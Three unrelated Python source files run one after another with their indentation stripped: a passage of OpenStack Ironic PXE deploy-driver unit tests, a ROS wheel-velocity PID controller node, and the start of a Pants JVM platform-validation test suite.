iwdi = task.node.driver_internal_info.get('is_whole_disk_image')
mock_switch.assert_called_once_with('/path', 'abcd', None, iwdi)
def test_prepare_node_active(self):
self.node.driver_internal_info = {'root_uuid_or_disk_id': 'abcd',
'is_whole_disk_image': False}
self.node.save()
self._test_prepare_node_active()
def test_prepare_node_active_without_is_whole_disk_image(self):
self.node.driver_internal_info = {'root_uuid_or_disk_id': 'abcd'}
self.node.save()
self._test_prepare_node_active()
@mock.patch.object(keystone, 'token_expires_soon')
@mock.patch.object(deploy_utils, 'get_image_mb')
@mock.patch.object(iscsi_deploy, '_get_image_file_path')
@mock.patch.object(iscsi_deploy, 'cache_instance_image')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
@mock.patch.object(manager_utils, 'node_power_action')
@mock.patch.object(manager_utils, 'node_set_boot_device')
def test_deploy(self, mock_node_set_boot, mock_node_power_action,
mock_update_dhcp, mock_cache_instance_image,
mock_get_image_file_path, mock_get_image_mb, mock_expire):
fake_img_path = '/test/path/test.img'
mock_get_image_file_path.return_value = fake_img_path
mock_get_image_mb.return_value = 1
mock_expire.return_value = False
self.config(deploy_callback_timeout=600, group='conductor')
with task_manager.acquire(self.context,
self.node.uuid, shared=False) as task:
dhcp_opts = pxe_utils.dhcp_options_for_instance(task)
state = task.driver.deploy.deploy(task)
self.assertEqual(state, states.DEPLOYWAIT)
mock_cache_instance_image.assert_called_once_with(
self.context, task.node)
mock_get_image_file_path.assert_called_once_with(task.node.uuid)
mock_get_image_mb.assert_called_once_with(fake_img_path)
mock_update_dhcp.assert_called_once_with(task, dhcp_opts)
mock_expire.assert_called_once_with(self.context.auth_token, 600)
mock_node_set_boot.assert_called_once_with(task, 'pxe',
persistent=True)
mock_node_power_action.assert_called_once_with(task, states.REBOOT)
# ensure token file created
t_path = pxe._get_token_file_path(self.node.uuid)
token = open(t_path, 'r').read()
self.assertEqual(self.context.auth_token, token)
@mock.patch.object(keystone, 'get_admin_auth_token')
@mock.patch.object(keystone, 'token_expires_soon')
@mock.patch.object(deploy_utils, 'get_image_mb')
@mock.patch.object(iscsi_deploy, '_get_image_file_path')
@mock.patch.object(iscsi_deploy, 'cache_instance_image')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
@mock.patch.object(manager_utils, 'node_power_action')
@mock.patch.object(manager_utils, 'node_set_boot_device')
def test_deploy_token_near_expiration(self, mock_node_set_boot,
mock_node_power_action, mock_update_dhcp,
mock_cache_instance_image, mock_get_image_file_path,
mock_get_image_mb, mock_expire, mock_admin_token):
mock_get_image_mb.return_value = 1
mock_expire.return_value = True
new_token = 'new_admin_token'
mock_admin_token.return_value = new_token
self.config(deploy_callback_timeout=600, group='conductor')
with task_manager.acquire(self.context,
self.node.uuid, shared=False) as task:
task.driver.deploy.deploy(task)
mock_expire.assert_called_once_with(self.context.auth_token, 600)
mock_admin_token.assert_called_once_with()
# ensure token file created with new token
t_path = pxe._get_token_file_path(self.node.uuid)
token = open(t_path, 'r').read()
self.assertEqual(new_token, token)
@mock.patch.object(deploy_utils, 'get_image_mb')
@mock.patch.object(iscsi_deploy, '_get_image_file_path')
@mock.patch.object(iscsi_deploy, 'cache_instance_image')
def test_deploy_image_too_large(self, mock_cache_instance_image,
mock_get_image_file_path,
mock_get_image_mb):
fake_img_path = '/test/path/test.img'
mock_get_image_file_path.return_value = fake_img_path
mock_get_image_mb.return_value = 999999
with task_manager.acquire(self.context,
self.node.uuid, shared=False) as task:
self.assertRaises(exception.InstanceDeployFailure,
task.driver.deploy.deploy, task)
mock_cache_instance_image.assert_called_once_with(
self.context, task.node)
mock_get_image_file_path.assert_called_once_with(task.node.uuid)
mock_get_image_mb.assert_called_once_with(fake_img_path)
@mock.patch.object(manager_utils, 'node_power_action')
def test_tear_down(self, node_power_mock):
with task_manager.acquire(self.context,
self.node.uuid) as task:
state = task.driver.deploy.tear_down(task)
self.assertEqual(states.DELETED, state)
node_power_mock.assert_called_once_with(task, states.POWER_OFF)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
def test_take_over(self, update_dhcp_mock, clean_pxe_mock):
with task_manager.acquire(
self.context, self.node.uuid, shared=True) as task:
dhcp_opts = pxe_utils.dhcp_options_for_instance(task)
task.driver.deploy.take_over(task)
# Assert we update the DHCP server
update_dhcp_mock.assert_called_once_with(task, dhcp_opts)
# Assert we don't clean the PXE config files in
# case it's not local boot
self.assertFalse(clean_pxe_mock.called)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
def test_take_over_localboot(self, update_dhcp_mock, clean_pxe_mock):
with task_manager.acquire(
self.context, self.node.uuid, shared=True) as task:
task.node.instance_info['capabilities'] = {"boot_option": "local"}
task.driver.deploy.take_over(task)
# Assert we are not attempting to update the DHCP
# server in case it's local boot
self.assertFalse(update_dhcp_mock.called)
# Assert we are cleaning the PXE config files
clean_pxe_mock.assert_called_once_with(task)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(manager_utils, 'node_set_boot_device')
@mock.patch.object(deploy_utils, 'notify_ramdisk_to_proceed')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(iscsi_deploy, 'InstanceImageCache')
@mock.patch.object(deploy_utils, 'deploy_partition_image')
def _test_pass_deploy_info_deploy(self, is_localboot, mock_deploy,
mock_image_cache, mock_switch_config,
notify_mock, mock_node_boot_dev,
mock_clean_pxe):
token_path = self._create_token_file()
# set local boot
if is_localboot:
i_info = self.node.instance_info
i_info['capabilities'] = '{"boot_option": "local"}'
self.node.instance_info = i_info
self.node.power_state = states.POWER_ON
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
root_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
mock_deploy.return_value = {'root uuid': root_uuid}
boot_mode = None
is_whole_disk_image = False
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.vendor.pass_deploy_info(
task, address='123456', iqn='aaa-bbb', key='fake-56789')
self.node.refresh()
self.assertEqual(states.POWER_ON, self.node.power_state)
self.assertIn('root_uuid_or_disk_id', self.node.driver_internal_info)
self.assertIsNone(self.node.last_error)
self.assertFalse(os.path.exists(token_path))
mock_image_cache.assert_called_once_with()
mock_image_cache.return_value.clean_up.assert_called_once_with()
pxe_config_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
notify_mock.assert_called_once_with('123456')
if is_localboot:
mock_node_boot_dev.assert_called_once_with(
mock.ANY, boot_devices.DISK, persistent=True)
mock_clean_pxe.assert_called_once_with(mock.ANY)
self.assertFalse(mock_switch_config.called)
else:
mock_switch_config.assert_called_once_with(pxe_config_path,
root_uuid,
boot_mode,
is_whole_disk_image)
self.assertFalse(mock_node_boot_dev.called)
self.assertFalse(mock_clean_pxe.called)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(manager_utils, 'node_set_boot_device')
@mock.patch.object(deploy_utils, 'notify_ramdisk_to_proceed')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(iscsi_deploy, 'InstanceImageCache')
@mock.patch.object(deploy_utils, 'deploy_disk_image')
def _test_pass_deploy_info_whole_disk_image(self, is_localboot,
mock_deploy,
mock_image_cache,
mock_switch_config,
notify_mock,
mock_node_boot_dev,
mock_clean_pxe):
token_path = self._create_token_file()
# set local boot
if is_localboot:
i_info = self.node.instance_info
i_info['capabilities'] = '{"boot_option": "local"}'
self.node.instance_info = i_info
self.node.power_state = states.POWER_ON
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
boot_mode = None
is_whole_disk_image = True
disk_id = '0x12345678'
mock_deploy.return_value = {'disk identifier': disk_id}
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.vendor.pass_deploy_info(task, address='123456',
iqn='aaa-bbb',
key='fake-56789')
self.node.refresh()
self.assertEqual(states.POWER_ON, self.node.power_state)
self.assertIsNone(self.node.last_error)
self.assertFalse(os.path.exists(token_path))
mock_image_cache.assert_called_once_with()
mock_image_cache.return_value.clean_up.assert_called_once_with()
pxe_config_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
notify_mock.assert_called_once_with('123456')
if is_localboot:
mock_node_boot_dev.assert_called_once_with(
mock.ANY, boot_devices.DISK, persistent=True)
mock_clean_pxe.assert_called_once_with(mock.ANY)
self.assertFalse(mock_switch_config.called)
else:
mock_switch_config.assert_called_once_with(pxe_config_path,
disk_id,
boot_mode,
is_whole_disk_image)
self.assertFalse(mock_node_boot_dev.called)
self.assertFalse(mock_clean_pxe.called)
def test_pass_deploy_info_deploy(self):
self._test_pass_deploy_info_deploy(False)
self.assertEqual(states.ACTIVE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
def test_pass_deploy_info_localboot(self):
self._test_pass_deploy_info_deploy(True)
self.assertEqual(states.DEPLOYWAIT, self.node.provision_state)
self.assertEqual(states.ACTIVE, self.node.target_provision_state)
def test_pass_deploy_info_whole_disk_image(self):
self._test_pass_deploy_info_whole_disk_image(False)
self.assertEqual(states.ACTIVE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
def test_pass_deploy_info_whole_disk_image_localboot(self):
self._test_pass_deploy_info_whole_disk_image(True)
self.assertEqual(states.ACTIVE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
def test_pass_deploy_info_invalid(self):
self.node.power_state = states.POWER_ON
self.node.provision_state = states.AVAILABLE
self.node.target_provision_state = states.NOSTATE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.InvalidState,
task.driver.vendor.pass_deploy_info,
task, address='123456', iqn='aaa-bbb',
key='fake-56789', error='test ramdisk error')
self.node.refresh()
self.assertEqual(states.AVAILABLE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
self.assertEqual(states.POWER_ON, self.node.power_state)
def test_lock_elevated(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
with mock.patch.object(task.driver.vendor,
'pass_deploy_info') as _cont_deploy_mock:
task.driver.vendor.pass_deploy_info(
task, address='123456', iqn='aaa-bbb', key='fake-56789')
# lock elevated w/o exception
self.assertEqual(1, _cont_deploy_mock.call_count,
"pass_deploy_info was not called once.")
def test_vendor_routes(self):
expected = ['heartbeat', 'pass_deploy_info',
'pass_bootloader_install_info']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
vendor_routes = task.driver.vendor.vendor_routes
self.assertIsInstance(vendor_routes, dict)
self.assertEqual(sorted(expected), sorted(list(vendor_routes)))
def test_driver_routes(self):
expected = ['lookup']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
driver_routes = task.driver.vendor.driver_routes
self.assertIsInstance(driver_routes, dict)
self.assertEqual(sorted(expected), sorted(list(driver_routes)))
@mock.patch.object(utils, 'unlink_without_raise')
@mock.patch.object(iscsi_deploy, 'destroy_images')
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(pxe, 'TFTPImageCache')
@mock.patch.object(pxe, '_get_image_info')
class CleanUpTestCase(db_base.DbTestCase):
def setUp(self):
super(CleanUpTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
instance_info = INST_INFO_DICT
instance_info['deploy_key'] = 'fake-56789'
self.node = obj_utils.create_test_node(
self.context, driver='fake_pxe',
instance_info=instance_info,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
def test_clean_up(self, mock_image_info, mock_cache, mock_pxe_clean,
mock_iscsi_clean, mock_unlink):
mock_image_info.return_value = {'label': ['', 'deploy_kernel']}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.clean_up(task)
mock_image_info.assert_called_once_with(task.node,
task.context)
mock_pxe_clean.assert_called_once_with(task)
mock_unlink.assert_any_call('deploy_kernel')
mock_unlink.assert_any_call(pxe._get_token_file_path(
task.node.uuid))
mock_iscsi_clean.assert_called_once_with(task.node.uuid)
mock_cache.return_value.clean_up.assert_called_once_with()
def test_clean_up_fail_get_image_info(self, mock_image_info, mock_cache,
mock_pxe_clean, mock_iscsi_clean,
mock_unlink):
mock_image_info.side_effect = exception.MissingParameterValue('foo')
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.clean_up(task)
mock_image_info.assert_called_once_with(task.node,
task.context)
mock_pxe_clean.assert_called_once_with(task)
mock_unlink.assert_called_once_with(pxe._get_token_file_path(
task.node.uuid))
mock_iscsi_clean.assert_called_once_with(task.node.uuid)
mock_cache.return_value.clean_up.assert_called_once_with()
class CleanUpFullFlowTestCase(db_base.DbTestCase):
def setUp(self):
super(CleanUpFullFlowTestCase, self).setUp()
self.config(image_cache_size=0, group='pxe')
# Configure node
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
instance_info = INST_INFO_DICT
instance_info['deploy_key'] = 'fake-56789'
self.node = obj_utils.create_test_node(
self.context, driver='fake_pxe',
instance_info=instance_info,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
# Configure temporary directories
pxe_temp_dir = tempfile.mkdtemp()
self.config(tftp_root=pxe_temp_dir, group='pxe')
tftp_master_dir = os.path.join(CONF.pxe.tftp_root,
'tftp_master')
self.config(tftp_master_path=tftp_master_dir, group='pxe')
os.makedirs(tftp_master_dir)
instance_temp_dir = tempfile.mkdtemp()
self.config(images_path=instance_temp_dir,
group='pxe')
instance_master_dir = os.path.join(CONF.pxe.images_path,
'instance_master')
self.config(instance_master_path=instance_master_dir,
group='pxe')
os.makedirs(instance_master_dir)
self.pxe_config_dir = os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg')
os.makedirs(self.pxe_config_dir)
# Populate some file names
self.master_kernel_path = os.path.join(CONF.pxe.tftp_master_path,
'kernel')
self.master_instance_path = os.path.join(CONF.pxe.instance_master_path,
'image_uuid')
self.node_tftp_dir = os.path.join(CONF.pxe.tftp_root,
self.node.uuid)
os.makedirs(self.node_tftp_dir)
self.kernel_path = os.path.join(self.node_tftp_dir,
'kernel')
self.node_image_dir = iscsi_deploy._get_image_dir_path(self.node.uuid)
os.makedirs(self.node_image_dir)
self.image_path = iscsi_deploy._get_image_file_path(self.node.uuid)
self.config_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
self.mac_path = pxe_utils._get_pxe_mac_path(self.port.address)
self.token_path = pxe._get_token_file_path(self.node.uuid)
# Create files
self.files = [self.config_path, self.master_kernel_path,
self.master_instance_path, self.token_path]
for fname in self.files:
# NOTE(dtantsur): files with 0 size won't be cleaned up
with open(fname, 'w') as fp:
fp.write('test')
os.link(self.config_path, self.mac_path)
os.link(self.master_kernel_path, self.kernel_path)
os.link(self.master_instance_path, self.image_path)
@mock.patch.object(pxe, '_get_image_info')
def test_clean_up_with_master(self, mock_get_image_info):
image_info = {'kernel': ('kernel_uuid',
self.kernel_path)}
mock_get_image_info.return_value = image_info
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.clean_up(task)
mock_get_image_info.assert_called_once_with(task.node,
task.context)
for path in ([self.kernel_path, self.image_path, self.config_path]
+ self.files):
self.assertFalse(os.path.exists(path),
'%s is not expected to exist' % path)
class TestAgentVendorPassthru(db_base.DbTestCase):
def setUp(self):
super(TestAgentVendorPassthru, self).setUp()
mgr_utils.mock_the_extension_manager()
self.driver = driver_factory.get_driver("fake")
self.driver.vendor = pxe.VendorPassthru()
self.node = obj_utils.create_test_node(
self.context, driver='fake',
instance_info=INST_INFO_DICT,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
self.node.driver_internal_info['agent_url'] = 'http://1.2.3.4:1234'
self.task = mock.Mock(spec=task_manager.TaskManager)
self.task.shared = False
self.task.node = self.node
self.task.driver = self.driver
self.task.context = self.context
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'reboot_and_finish_deploy')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(iscsi_deploy, 'do_agent_iscsi_deploy')
@mock.patch.object(pxe, '_destroy_token_file')
def test_continue_deploy_netboot(self, destroy_token_file_mock,
do_agent_iscsi_deploy_mock,
switch_pxe_config_mock,
reboot_and_finish_deploy_mock):
uuid_dict_returned = {'root uuid': 'some-root-uuid'}
do_agent_iscsi_deploy_mock.return_value = uuid_dict_returned
self.driver.vendor.continue_deploy(self.task)
destroy_token_file_mock.assert_called_once_with(self.node)
do_agent_iscsi_deploy_mock.assert_called_once_with(
self.task, self.driver.vendor._client)
tftp_config = '/tftpboot/%s/config' % self.node.uuid
switch_pxe_config_mock.assert_called_once_with(tftp_config,
'some-root-uuid',
None, False)
reboot_and_finish_deploy_mock.assert_called_once_with(self.task)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'reboot_and_finish_deploy')
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot')
@mock.patch.object(iscsi_deploy, 'do_agent_iscsi_deploy')
@mock.patch.object(pxe, '_destroy_token_file')
def test_continue_deploy_localboot(self, destroy_token_file_mock,
do_agent_iscsi_deploy_mock,
configure_local_boot_mock,
clean_up_pxe_config_mock,
reboot_and_finish_deploy_mock):
self.node.instance_info = {
'capabilities': {'boot_option': 'local'}}
self.node.save()
uuid_dict_returned = {'root uuid': 'some-root-uuid'}
do_agent_iscsi_deploy_mock.return_value = uuid_dict_returned
self.driver.vendor.continue_deploy(self.task)
destroy_token_file_mock.assert_called_once_with(self.node)
do_agent_iscsi_deploy_mock.assert_called_once_with(
self.task, self.driver.vendor._client)
configure_local_boot_mock.assert_called_once_with(
self.task, root_uuid='some-root-uuid', efi_system_part_uuid=None)
clean_up_pxe_config_mock.assert_called_once_with(self.task)
reboot_and_finish_deploy_mock.assert_called_once_with(self.task)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'reboot_and_finish_deploy')
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot')
@mock.patch.object(iscsi_deploy, 'do_agent_iscsi_deploy')
@mock.patch.object(pxe, '_destroy_token_file')
def test_continue_deploy_localboot_uefi(self, destroy_token_file_mock,
do_agent_iscsi_deploy_mock,
configure_local_boot_mock,
clean_up_pxe_config_mock,
reboot_and_finish_deploy_mock):
self.node.instance_info = {
'capabilities': {'boot_option': 'local'}}
self.node.save()
uuid_dict_returned = {'root uuid': 'some-root-uuid',
'efi system partition uuid': 'efi-part-uuid'}
do_agent_iscsi_deploy_mock.return_value = uuid_dict_returned
self.driver.vendor.continue_deploy(self.task)
destroy_token_file_mock.assert_called_once_with(self.node)
do_agent_iscsi_deploy_mock.assert_called_once_with(
self.task, self.driver.vendor._client)
configure_local_boot_mock.assert_called_once_with(
self.task, root_uuid='some-root-uuid',
efi_system_part_uuid='efi-part-uuid')
clean_up_pxe_config_mock.assert_called_once_with(self.task)
reboot_and_finish_deploy_mock.assert_called_once_with(self.task)
|
|
#!/usr/bin/env python
"""
pid_velocity - takes messages on wheel_vtarget
target velocities for the wheels and monitors wheel for feedback
Copyright (C) 2012 Jon Stephan.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import rospy
import roslib
from std_msgs.msg import Int16
from std_msgs.msg import Float32
from numpy import array
######################################################
######################################################
class PidVelocity():
######################################################
######################################################
#####################################################
def __init__(self):
#####################################################
rospy.init_node("rpid_velocity")
self.nodename = rospy.get_name()
rospy.loginfo("%s started" % self.nodename)
### initialize variables
self.target = 0
self.motor = 0
self.vel = 0
self.integral = 0
self.error = 0
self.derivative = 0
self.previous_error = 0
self.wheel_prev = 0
self.wheel_latest = 0
self.then = rospy.Time.now()
self.wheel_mult = 0
self.prev_encoder = 0
### get parameters ####
self.Kp = rospy.get_param('~Kp',10)
self.Ki = rospy.get_param('~Ki',10)
self.Kd = rospy.get_param('~Kd',0.001)
self.out_min = rospy.get_param('~out_min',-255)
self.out_max = rospy.get_param('~out_max',255)
self.rate = rospy.get_param('~rate',30)
self.rolling_pts = rospy.get_param('~rolling_pts',2)
self.timeout_ticks = rospy.get_param('~timeout_ticks',4)
self.ticks_per_meter = rospy.get_param('ticks_meter', 20)
self.vel_threshold = rospy.get_param('~vel_threshold', 0.001)
self.encoder_min = rospy.get_param('encoder_min', -32768)
self.encoder_max = rospy.get_param('encoder_max', 32768)
self.encoder_low_wrap = rospy.get_param('wheel_low_wrap', (self.encoder_max - self.encoder_min) * 0.3 + self.encoder_min )
self.encoder_high_wrap = rospy.get_param('wheel_high_wrap', (self.encoder_max - self.encoder_min) * 0.7 + self.encoder_min )
self.prev_vel = [0.0] * self.rolling_pts
self.wheel_latest = 0.0
self.prev_pid_time = rospy.Time.now()
rospy.logdebug("%s got Kp:%0.3f Ki:%0.3f Kd:%0.3f tpm:%0.3f" % (self.nodename, self.Kp, self.Ki, self.Kd, self.ticks_per_meter))
#### subscribers/publishers
rospy.Subscriber("wheel", Int16, self.wheelCallback)
rospy.Subscriber("wheel_vtarget", Float32, self.targetCallback)
self.pub_motor = rospy.Publisher('motor_cmd',Float32,queue_size=10)
self.pub_vel = rospy.Publisher('wheel_vel', Float32,queue_size=10)
#####################################################
def spin(self):
#####################################################
self.r = rospy.Rate(self.rate)
self.then = rospy.Time.now()
self.ticks_since_target = self.timeout_ticks
self.wheel_prev = self.wheel_latest
self.then = rospy.Time.now()
while not rospy.is_shutdown():
self.spinOnce()
self.r.sleep()
#####################################################
def spinOnce(self):
#####################################################
self.previous_error = 0.0
self.prev_vel = [0.0] * self.rolling_pts
self.integral = 0.0
self.error = 0.0
self.derivative = 0.0
self.vel = 0.0
# only do the loop if we've recently recieved a target velocity message
while not rospy.is_shutdown() and self.ticks_since_target < self.timeout_ticks:
self.calcVelocity()
self.doPid()
self.pub_motor.publish(self.motor)
self.r.sleep()
self.ticks_since_target += 1
if self.ticks_since_target == self.timeout_ticks:
self.pub_motor.publish(0)
#####################################################
def calcVelocity(self):
#####################################################
self.dt_duration = rospy.Time.now() - self.then
self.dt = self.dt_duration.to_sec()
rospy.logdebug("-D- %s caclVelocity dt=%0.3f wheel_latest=%0.3f wheel_prev=%0.3f" % (self.nodename, self.dt, self.wheel_latest, self.wheel_prev))
if (self.wheel_latest == self.wheel_prev):
# we haven't received an updated wheel lately
cur_vel = (1 / self.ticks_per_meter) / self.dt # if we got a tick right now, this would be the velocity
if abs(cur_vel) < self.vel_threshold:
# if the velocity is < threshold, consider our velocity 0
rospy.logdebug("-D- %s below threshold cur_vel=%0.3f vel=0" % (self.nodename, cur_vel))
self.appendVel(0)
self.calcRollingVel()
else:
rospy.logdebug("-D- %s above threshold cur_vel=%0.3f" % (self.nodename, cur_vel))
if abs(cur_vel) < self.vel:
rospy.logdebug("-D- %s cur_vel < self.vel" % self.nodename)
# we know we're slower than what we're currently publishing as a velocity
self.appendVel(cur_vel)
self.calcRollingVel()
else:
# we received a new wheel value
cur_vel = (self.wheel_latest - self.wheel_prev) / self.dt
self.appendVel(cur_vel)
self.calcRollingVel()
rospy.logdebug("-D- %s **** wheel updated vel=%0.3f **** " % (self.nodename, self.vel))
self.wheel_prev = self.wheel_latest
self.then = rospy.Time.now()
self.pub_vel.publish(self.vel)
#####################################################
def appendVel(self, val):
#####################################################
self.prev_vel.append(val)
del self.prev_vel[0]
#####################################################
def calcRollingVel(self):
#####################################################
p = array(self.prev_vel)
self.vel = p.mean()
#####################################################
def doPid(self):
#####################################################
pid_dt_duration = rospy.Time.now() - self.prev_pid_time
pid_dt = pid_dt_duration.to_sec()
self.prev_pid_time = rospy.Time.now()
self.error = self.target - self.vel
self.integral = self.integral + (self.error * pid_dt)
# rospy.loginfo("i = i + (e * dt): %0.3f = %0.3f + (%0.3f * %0.3f)" % (self.integral, self.integral, self.error, pid_dt))
self.derivative = (self.error - self.previous_error) / pid_dt
self.previous_error = self.error
self.motor = (self.Kp * self.error) + (self.Ki * self.integral) + (self.Kd * self.derivative)
if self.motor > self.out_max:
self.motor = self.out_max
self.integral = self.integral - (self.error * pid_dt)
if self.motor < self.out_min:
self.motor = self.out_min
self.integral = self.integral - (self.error * pid_dt)
if (self.target == 0):
self.motor = 0
rospy.logdebug("vel:%0.2f tar:%0.2f err:%0.2f int:%0.2f der:%0.2f ## motor:%d " %
(self.vel, self.target, self.error, self.integral, self.derivative, self.motor))
#####################################################
def wheelCallback(self, msg):
######################################################
enc = msg.data
if (enc < self.encoder_low_wrap and self.prev_encoder > self.encoder_high_wrap) :
self.wheel_mult = self.wheel_mult + 1
if (enc > self.encoder_high_wrap and self.prev_encoder < self.encoder_low_wrap) :
self.wheel_mult = self.wheel_mult - 1
self.wheel_latest = 1.0 * (enc + self.wheel_mult * (self.encoder_max - self.encoder_min)) / self.ticks_per_meter
self.prev_encoder = enc
# rospy.logdebug("-D- %s wheelCallback msg.data= %0.3f wheel_latest = %0.3f mult=%0.3f" % (self.nodename, enc, self.wheel_latest, self.wheel_mult))
######################################################
def targetCallback(self, msg):
######################################################
self.target = msg.data
self.ticks_since_target = 0
# rospy.logdebug("-D- %s targetCallback " % (self.nodename))
if __name__ == '__main__':
""" main """
pidVelocity = PidVelocity()
pidVelocity.spin()
|
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import filter, object
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.tasks.jvm_platform_analysis import JvmPlatformExplain, JvmPlatformValidate
from pants.build_graph.target import Target
from pants_test.task_test_base import TaskTestBase
class JvmPlatformAnalysisTestMixin(object):
"""Common helper methods for testing JvmPlatformValidate and JvmPlatformExplain.
Mostly for building sets of targets that are interesting for testing.
"""
def _java(self, name, platform=None, deps=None):
return self.make_target(spec='java:{}'.format(name),
target_type=JavaLibrary,
platform=platform,
dependencies=deps or [],
sources=[])
def _plain(self, name, deps=None):
"""Make a non-jvm target, useful for testing non-jvm intermediate dependencies."""
return self.make_target(spec='java:{}'.format(name),
target_type=Target,
dependencies=deps or [],)
def simple_task(self, targets, **options):
self.set_options(**options)
platforms = {
'6': { 'source': 6, 'target': 6, 'args': [], },
'7': { 'source': 7, 'target': 7, 'args': [], },
'8': { 'source': 8, 'target': 8, 'args': [], },
}
self.set_options_for_scope('jvm-platform', platforms=platforms, default_platform='6')
context = self.context(target_roots=targets)
return self.create_task(context)
def bad_targets(self):
one = self._java('one', '7')
two = self._java('two', '6', deps=[one])
return [one, two]
def good_targets(self):
one = self._java('one', '6')
two = self._java('two', '7', deps=[one])
return [one, two]
def bad_transitive_targets(self):
one = self._java('one', '7')
middle = self._plain('middle', deps=[one])
two = self._java('two', '6', deps=[middle])
return [one, two, middle]
def good_transitive_targets(self):
one = self._java('one', '6')
middle = self._plain('middle', deps=[one])
two = self._java('two', '7', deps=[middle])
return [one, two, middle]
def impossible_targets(self):
a = self._java('a', '8')
b = self._java('b', '7', deps=[a])
c = self._java('c', '6', deps=[b])
# :b depends on :a, which means :b can't have a target lower than 8.
# :b is depended on by :c, which means :b can't have a target level higher than 6.
return [a, b, c]
class JvmPlatformValidateTest(JvmPlatformAnalysisTestMixin, TaskTestBase):
@classmethod
def task_type(cls):
return JvmPlatformValidate
def assert_no_warning(self, targets, **options):
self.assertTrue(self.simple_task(targets, **options).execute() is None)
def assert_warning(self, targets, **options):
self.assertTrue(self.simple_task(targets, **options).execute() is not None)
def test_good_works(self):
self.assert_no_warning(self.good_targets(), check='fatal')
def test_transitive_good_works(self):
self.assert_no_warning(self.good_transitive_targets(), check='fatal')
def test_bad_fails(self):
with self.assertRaises(JvmPlatformValidate.IllegalJavaTargetLevelDependency):
self.simple_task(self.bad_targets(), check='fatal').execute()
def test_transitive_bad_fails(self):
with self.assertRaises(JvmPlatformValidate.IllegalJavaTargetLevelDependency):
self.simple_task(self.bad_transitive_targets(), check='fatal').execute()
def test_impossible_fails(self):
with self.assertRaises(JvmPlatformValidate.IllegalJavaTargetLevelDependency):
self.simple_task(self.impossible_targets(), check='fatal').execute()
def test_bad_ignored(self):
self.assert_no_warning(self.bad_targets(), check='off')
def test_transitive_bad_ignored(self):
self.assert_no_warning(self.bad_transitive_targets(), check='off')
def test_bad_warned(self):
self.assert_warning(self.bad_targets(), check='warn')
def test_transitive_bad_warned(self):
self.assert_warning(self.bad_transitive_targets(), check='warn')
def test_inverted_ordering_works(self):
self.assert_warning(self.bad_targets(), check='warn', children_before_parents=True)
def construct_interesting_graph(self):
"""Constructs an "interesting" transitive graph, with a mix of jvm and non-jvm targets.
Drawn in ascii below, with '->' indicating dependencies, with capital letters indicating
JvmTargets and lower-case letters indicating non-JvmTargets.
A -> B
-> c -> D -> l -> N
-> f -> G
-> e -> q
Constructed to demonstrate the behavior of jvm_dependency_map on dependency
graphs that include many intermediate dependencies which are not JvmTargets.
"""
q = self._plain('q')
e = self._plain('e', deps=[q])
n = self._java('n')
l = self._plain('l', deps=[n])
